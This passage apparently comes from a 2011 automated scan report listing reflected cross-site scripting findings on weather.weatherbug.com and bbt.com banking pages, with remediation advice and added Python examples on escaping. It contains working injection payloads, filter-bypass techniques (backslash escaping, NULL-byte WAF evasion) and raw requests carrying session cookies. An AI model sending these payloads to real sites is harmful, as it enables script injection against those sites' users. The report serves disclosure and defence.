/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */ try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={} ...[SNIP]... omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL> ...[SNIP]...
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 100657 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:53 GMT Connection: close
...[SNIP]... <script type="text/javascript"> var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8&region=8&region_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1"; </script> ...[SNIP]...
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 104331 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:36 GMT Connection: close
The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must happen before the quotation marks are escaped; otherwise the backslash the application adds in front of a quote can itself be neutralised by an attacker-supplied backslash, which is exactly what the attack above does.
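The following is an added example, not code from the scan report or from the affected site. It models the quote-only escaping described above beside a correct encoder for a single-quoted JavaScript string, and uses a small literal scanner to show which one lets the report's zcode payload terminate the string. The `var zcode = '...'` template and the helper names are assumptions; the payload is the one the report submitted.

```python
# Added example (not from the scan report): why escaping only the quote fails, and a
# JavaScript-string encoder that closes the gap. The template and function names are
# assumptions; PAYLOAD is the report's zcode payload after URL decoding.
import json

PAYLOAD = "b8c92\\';alert(1)//fb3d6162354"


def naive_escape(value: str) -> str:
    """The defence described in the report: prefix quotes with a backslash, ignore backslashes."""
    return value.replace("'", "\\'")


def safe_escape(value: str) -> str:
    """Escape for a single-quoted JS string literal: backslash FIRST, then the quote,
    then line terminators and '</' (so </script> cannot close the enclosing block)."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace("\n", "\\n")
                 .replace("\r", "\\r")
                 .replace("\u2028", "\\u2028")
                 .replace("\u2029", "\\u2029")
                 .replace("</", "<\\/"))


def json_literal(value: str) -> str:
    """Alternative: emit a double-quoted JSON literal and hex-escape '<' to keep </script> out."""
    return json.dumps(value).replace("<", "\\u003c")


def render(escaper, value: str) -> str:
    """Assumed server-side template: the zcode value echoed inside a single-quoted literal."""
    return "var zcode = '" + escaper(value) + "';"


def literal_end(src: str, start: int) -> int:
    """Scan a single-quoted JS string literal that opens at src[start]. A backslash consumes
    the following character. Return the index of the closing quote, or -1 if never closed."""
    i = start + 1
    while i < len(src):
        if src[i] == "\\":
            i += 2
            continue
        if src[i] == "'":
            return i
        i += 1
    return -1


def breaks_out(escaper, value: str) -> bool:
    """True if attacker-controlled text closes the literal before the template's own closing
    quote, leaving the remainder (here ';alert(1)//...') to execute as JavaScript."""
    rendered = render(escaper, value)
    opening = rendered.index("'")
    template_close = len(rendered) - 2      # the quote just before the final ';'
    return literal_end(rendered, opening) != template_close


if __name__ == "__main__":
    for name, esc in (("naive", naive_escape), ("safe", safe_escape)):
        print(f"{name:5s} {render(esc, PAYLOAD)}   breaks out: {breaks_out(esc, PAYLOAD)}")
```

With the naive encoder the rendered line is `var zcode = 'b8c92\\';alert(1)//fb3d6162354';`, which is the exact form the report shows being echoed: the two backslashes pair off, the quote closes the string, and `alert(1)` runs. Escaping the backslash first produces `b8c92\\\'`, which stays inside the literal. In practice, prefer a maintained encoder or a JSON serialiser over a hand-rolled chain of replacements.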
Request
GET /?zip=75201&zcode=6292b8c92\'%3balert(1)//fb3d6162354 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 101771 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:35:04 GMT Connection: close
The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 was submitted in the zcode parameter. This input was echoed as 478ba"style="x:expression(alert(1))"78c9aed888 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated CSS expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to older versions of Internet Explorer (dynamic expressions are not supported in IE8 standards mode and later), and will not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?zip=75201&zcode=478ba"style%3d"x%3aexpression(alert(1))"78c9aed888 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Length: 103556 Content-Type: text/html; charset=utf-8 Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/ p3p: CP="NON DSP COR NID" X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Cache-Control: max-age=2700 Date: Thu, 03 Feb 2011 16:34:49 GMT Connection: close
4.441. http://www.bbt.com/bbt/Business/Products/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Business/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f5e39"><script>alert(1)</script>409e4716c9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5e39"><script>alert(1)</script>409e4716c9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
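The following is an added example, not code from the scan report or from the affected site. It models the two components the remediation note describes: a native-code filter that percent-decodes the query and then inspects it as a NUL-terminated C string, and a managed application that sees the whole parameter name, drops the NUL and concatenates it into a double-quoted href attribute (the shape of the response fragment shown for /bbt/about/). The hardened renderer rejects NUL bytes and HTML-attribute-encodes what it reflects; that encoding also covers the `"style="x:expression(...)` attribute breakout in the weather.weatherbug.com finding above. The filter token list, the href template and the rejection policy are assumptions; the payload is the report's.

```python
# Added example (not from the scan report): why a NUL byte slips past a native-code
# filter, and how the application should render reflected parameter names instead.
# The filter, href template and rejection policy are assumptions; RAW_QUERY is the
# report's payload for /bbt/Business/Products/.
import html
from urllib.parse import parse_qsl, unquote_to_bytes

RAW_QUERY = '%00f5e39"><script>alert(1)</script>409e4716c9d=1'   # report payload
CLEAN_QUERY = 'f5e39"><script>alert(1)</script>409e4716c9d=1'     # same, without %00

BLOCKED_TOKENS = (b"<script", b"javascript:", b"onclick=")        # assumed WAF rules


def native_filter_blocks(raw_query: str) -> bool:
    """Model of a WAF written in C: it percent-decodes the query, then inspects it as a
    NUL-terminated string, so everything after the first 0x00 byte is invisible to it."""
    decoded = unquote_to_bytes(raw_query)
    c_string_view = decoded.split(b"\x00", 1)[0]
    return any(tok in c_string_view.lower() for tok in BLOCKED_TOKENS)


def vulnerable_render(raw_query: str) -> str:
    """The behaviour the report shows: the managed app sees the whole name, drops the NUL,
    and concatenates it raw into a double-quoted href attribute."""
    parts = []
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        stripped = name.replace("\x00", "")
        parts.append(f"{stripped}={value}")
    return '<a href="/bbt/about/default.html?page=print&' + "&".join(parts) + '">print</a>'


def safe_render(raw_query: str):
    """Fix in the application itself: refuse NUL bytes outright (None -> respond HTTP 400)
    and HTML-attribute-encode every reflected name and value."""
    parts = []
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        if "\x00" in name or "\x00" in value:
            return None
        parts.append(html.escape(name, quote=True) + "=" + html.escape(value, quote=True))
    return ('<a href="/bbt/about/default.html?page=print&amp;'
            + "&amp;".join(parts) + '">print</a>')


def request_outcome(raw_query: str) -> str:
    """End to end, WAF first and then the unfixed app, as in the deployment the report implies."""
    if native_filter_blocks(raw_query):
        return "blocked by WAF"
    page = vulnerable_render(raw_query)
    return "XSS" if "<script>" in page else "clean"


if __name__ == "__main__":
    print("without %00:", request_outcome(CLEAN_QUERY))
    print("with %00   :", request_outcome(RAW_QUERY))
    print("hardened   :", safe_render(CLEAN_QUERY))
```

Run stand-alone, the script shows the same payload blocked when sent plainly and reflected as live markup when prefixed with `%00`, because the filter's view of the string is empty. The hardened renderer does not depend on the filter at all, which is the point of the remediation note: the NUL handling is a WAF defect to report to the vendor, but the vulnerability is the missing output encoding in the application.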
Request
GET /bbt/Business/Products/?%00f5e39"><script>alert(1)</script>409e4716c9d=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:13 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 53268 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.442. http://www.bbt.com/bbt/Personal/Products/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/Personal/Products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0069b54"><script>alert(1)</script>e1573406ba9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b54"><script>alert(1)</script>e1573406ba9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/Personal/Products/?%0069b54"><script>alert(1)</script>e1573406ba9=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:49 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 40557 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.443. http://www.bbt.com/bbt/about/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/about/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002a618"><script>alert(1)</script>b69e85cef55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a618"><script>alert(1)</script>b69e85cef55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/?%002a618"><script>alert(1)</script>b69e85cef55=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:46 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 27477 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> < ...[SNIP]... <a href="/bbt/about/default.html?page=print&%002a618"><script>alert(1)</script>b69e85cef55=1" onClick="NewWindow(this.href,'product','650','500','yes');return false;"> ...[SNIP]...
4.444. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007a93d"><script>alert(1)</script>a2f88c48136 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a93d"><script>alert(1)</script>a2f88c48136 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/about/privacyandsecurity/completeclientprotection/default.html?%007a93d"><script>alert(1)</script>a2f88c48136=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30854 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
4.445. http://www.bbt.com/bbt/careers/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/careers/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0012a7a"><script>alert(1)</script>5fb5315ccee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12a7a"><script>alert(1)</script>5fb5315ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/careers/?%0012a7a"><script>alert(1)</script>5fb5315ccee=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 14:11:51 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 33957 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.446. http://www.bbt.com/bbt/mobile/mobile-product.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/mobile/mobile-product.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9529"><script>alert(1)</script>45d303da152 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9529"><script>alert(1)</script>45d303da152 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/mobile/mobile-product.html?%00f9529"><script>alert(1)</script>45d303da152=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:30 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 30271 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.447. http://www.bbt.com/bbt/personal/products/checkcard/default.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/checkcard/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0055e59"><script>alert(1)</script>759ab4bcd91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55e59"><script>alert(1)</script>759ab4bcd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/checkcard/default.html?%0055e59"><script>alert(1)</script>759ab4bcd91=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:33 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 31030 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.448. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/personal/products/onlinebanking/default.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %006f039"><script>alert(1)</script>d7e45a2b9d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f039"><script>alert(1)</script>d7e45a2b9d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /bbt/personal/products/onlinebanking/default.html?%006f039"><script>alert(1)</script>d7e45a2b9d5=1 HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response
HTTP/1.1 200 OK connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:39 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 35938 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
4.449. http://www.bbt.com/bbt/sitemap.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.bbt.com
Path:
/bbt/sitemap.html
Issue detail
